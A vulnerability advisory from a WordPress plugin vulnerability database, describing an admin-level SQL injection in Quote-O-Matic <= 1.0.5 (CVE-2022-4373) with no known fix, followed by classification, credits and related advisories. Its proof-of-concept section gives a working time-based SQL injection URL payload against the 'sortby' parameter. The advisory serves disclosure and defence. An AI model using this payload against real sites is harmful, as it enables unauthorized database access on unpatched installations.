WordPress Plugin Vulnerabilities

Quote-O-Matic <= 1.0.5 - Admin+ SQLi

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

https://example.com/wp-admin/edit.php?page=quote-o-matic.php&sortby=qomID+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)

Affects Plugins

Plugin icon
quote-o-matic
No known fix

References

CVE
CVE-2022-4373

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Submitter website
https://www.iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
aa07ddac-4f3d-4c4c-ba26-19bc05f22f02

Timeline

Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)

Other

Published
Title
Published
2023-07-18
Title
WP Donate < 1.5 - Unauthenticated SQL Injection
Published
2022-02-18
Title
Zero Spam < 5.2.11 - Admin+ SQL Injection
Published
2021-03-15
Title
Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_question_form
Published
2022-10-24
Title
IP Blacklist Cloud Plugin <= 5.00 - Admin+ SQLi
Published
2020-07-10
Title
SRS Simple Hits Counter 1.0.3 - 1.0.4 - Unauthenticated Blind SQL Injection